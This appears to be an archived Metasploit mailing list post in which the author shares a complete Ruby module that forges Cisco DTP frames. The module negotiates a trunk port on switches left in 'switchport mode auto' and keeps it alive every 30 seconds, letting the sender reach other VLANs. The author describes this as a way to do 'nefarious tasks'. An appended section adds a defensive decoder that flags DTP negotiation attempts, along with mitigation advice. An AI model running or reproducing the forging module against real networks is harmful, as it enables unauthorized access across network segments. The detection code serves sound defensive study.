Metasploit mailing list archives
Dynamic Trunk Protocol (DTP) Module
From: Spencer McIntyre <zerosteiner () gmail com>
Date: Thu, 08 Jul 2010 23:24:52 -0700
I have written a module for Metasploit that will forge DTP packets to negotiate a trunk with a Cisco switch that has been improperly configured with the "switchport mode auto" setting. This module, although not significant in itself, places the user in a position to add an 802.1Q interface onto their system and access another network or do other nefarious tasks. It might be worthwhile to also mention that this is not exploiting a flaw within IOS but a feature. I am currently testing a PVSTP+ module I have also written that works well in conjunction with this DTP module.
By default this module runs in the background and periodically sends a DTP packet to keep the trunk connection alive. I hope someone else finds this useful.
Spencer McIntyre
zeroSteiner () gmail com

#begin auxiliary/spoof/cisco/dtp.rb
require 'msf/core'
require 'racket'

class Metasploit3 < Msf::Auxiliary

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Forge DTP Packets',
			'Description'    => %q{
				This module forges DTP packets to initialize a trunk port.
			},
			'Author'         => [ 'Spencer McIntyre' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7 $',
			'Actions'        => [ [ 'Service' ] ],
			'PassiveActions' => [ 'Service' ],
			'DefaultAction'  => 'Service'
		))

		register_options([
			OptString.new('DOMAIN', [ false, "DTP Domain Name", '']),
			OptString.new('IFACE',  [ true,  "Interface To Use", 'eth0']),
		], self.class)
	end

	def run
		n = Racket::Racket.new
		@run = true

		# an empty domain is sent as a null-padded name
		domain = datastore['DOMAIN']
		if domain == ""
			domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		end

		n.l2 = Racket::L2::Ethernet.new()
		n.l2.dst_mac = '01:00:0c:cc:cc:cc' # this has to stay the same
		# 802.3 length field: 8 bytes of LLC/SNAP + 26 bytes of DTP TLVs + domain
		n.l2.ethertype = (domain.length + 34)

		# LLC/SNAP header with the Cisco OUI and the DTP protocol id
		n.l3 = Racket::L2::LLC.new()
		n.l3.control = 0x03
		n.l3.dsap = 0xaa
		n.l3.ssap = 0xaa
		cisco_vendor_code = "\x00\x00\x0c"
		pid = "\x20\x04" # 2004 is DTP
		n.l3.payload = cisco_vendor_code + pid

		# DTP info section: version byte followed by type/length/value records,
		# each length counting its own 4-byte header
		dtp_version = "\x01"

		dtp_domain_type = "\x00\x01"
		dtp_domain_len  = [ (domain.length + 5) ].pack("n")
		dtp_domain      = domain + "\x00"
		dtp_domain_section = dtp_domain_type + dtp_domain_len + dtp_domain

		dtp_status_type = "\x00\x02"
		dtp_status_len  = "\x00\x05"
		dtp_status      = "\x03"
		dtp_status_section = dtp_status_type + dtp_status_len + dtp_status

		dtp_type_type = "\x00\x03"
		dtp_type_len  = "\x00\x05"
		dtp_type      = "\xa5"
		dtp_type_section = dtp_type_type + dtp_type_len + dtp_type

		dtp_neighbor_type = "\x00\x04"
		dtp_neighbor_len  = "\x00\x0a"
		dtp_neighbor      = "\x11\x22\x33\x44\x55\x66"
		dtp_neighbor_section = dtp_neighbor_type + dtp_neighbor_len + dtp_neighbor

		n.l3.payload += dtp_version + dtp_domain_section + dtp_status_section + dtp_type_section + dtp_neighbor_section

		n.iface = datastore['IFACE']
		n.pack()

		# keep the trunk alive by resending the frame every 30 seconds
		while @run
			n.send2()
			select(nil, nil, nil, 30)
		end
	end
end

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
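As an added example (not part of Spencer's module or of Metasploit), a small Ruby decoder for the frame layout the module builds, the kind of check a monitor on an access port would run: it validates the LLC/SNAP header, walks the DTP TLVs, decodes the status byte and flags an 'on' or 'desirable' request from a MAC that is not a known switch. The status-byte split (high bit operating status, low three bits administrative mode), the sample source MAC and the constructed frame bytes are assumptions of this example.

```ruby
# Added example, not the module's code: decode a DTP frame laid out as the
# module above builds it and flag trunk negotiation seen on an access port.
DTP_DST_MAC  = ['01000ccccccc'].pack('H*')       # Cisco multicast used by DTP
LLC_SNAP_DTP = ['aaaa0300000c2004'].pack('H*')   # LLC/SNAP, Cisco OUI, PID 0x2004
TLV_NAMES = { 1 => :domain, 2 => :status, 3 => :type, 4 => :neighbor }
# Low 3 bits of the status byte: administrative mode, same keywords as
# "switchport mode"; high bit: operating status (0 access, 1 trunk). Assumed.
TAS = { 1 => 'on', 2 => 'off', 3 => 'desirable', 4 => 'auto' }

# Constructed sample: the bytes the module sends with DOMAIN left empty.
SAMPLE_FRAME = [[
  '01000ccccccc', '001122334455', '002b',     # dst, src (constructed), 802.3 length
  'aaaa0300000c2004', '01',                   # LLC/SNAP + DTP version
  '0001000e' + '00' * 10,                     # domain TLV: null-padded empty domain
  '0002000503',                               # status TLV: access, desirable
  '00030005a5',                               # type TLV: raw 0xa5
  '0004000a112233445566'                      # neighbor TLV
].join].pack('H*')

def mac_str(bytes)
  bytes.unpack('C*').map { |b| format('%02x', b) }.join(':')
end

# Returns a hash of decoded fields, or nil when the frame is not DTP.
def parse_dtp(frame)
  f = frame.b
  return nil if f.bytesize < 23 || f[0, 6] != DTP_DST_MAC || f[14, 8] != LLC_SNAP_DTP
  len = f[12, 2].unpack('n').first
  return nil if len < 9
  body = f[22, len - 8]                       # DTP payload after the 8-byte LLC/SNAP
  tlvs, off = {}, 1                           # byte 0 is the DTP version
  while off + 4 <= body.bytesize
    type, tlen = body[off, 4].unpack('nn')
    break if tlen < 4 || off + tlen > body.bytesize
    tlvs[TLV_NAMES.fetch(type, type)] = body[off + 4, tlen - 4]
    off += tlen
  end
  status = tlvs[:status] && tlvs[:status].getbyte(0)
  { src_mac:  mac_str(f[6, 6]),
    version:  body.getbyte(0),
    domain:   tlvs.fetch(:domain, '').delete("\x00"),
    tos:      status && ((status & 0x80).zero? ? 'access' : 'trunk'),
    tas:      status && TAS.fetch(status & 0x07, 'unknown'),
    type:     tlvs[:type] && tlvs[:type].getbyte(0),
    neighbor: tlvs[:neighbor] && mac_str(tlvs[:neighbor]) }
end

# On a port where no switch is expected, a DTP frame asking for 'on' or
# 'desirable' from an unknown source MAC is a trunk negotiation attempt.
def negotiation_attempt?(parsed, known_switch_macs)
  return false if parsed.nil? || known_switch_macs.include?(parsed[:src_mac])
  %w[on desirable].include?(parsed[:tas])
end
```

Disabling DTP on access ports ("switchport nonegotiate") stops the switch from honouring such a frame; the decoder only tells you that one was sent.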
Current thread:
- Dynamic Trunk Protocol (DTP) Module Spencer McIntyre (Jul 08)
- Re: Dynamic Trunk Protocol (DTP) Module Jon Hart (Jul 09)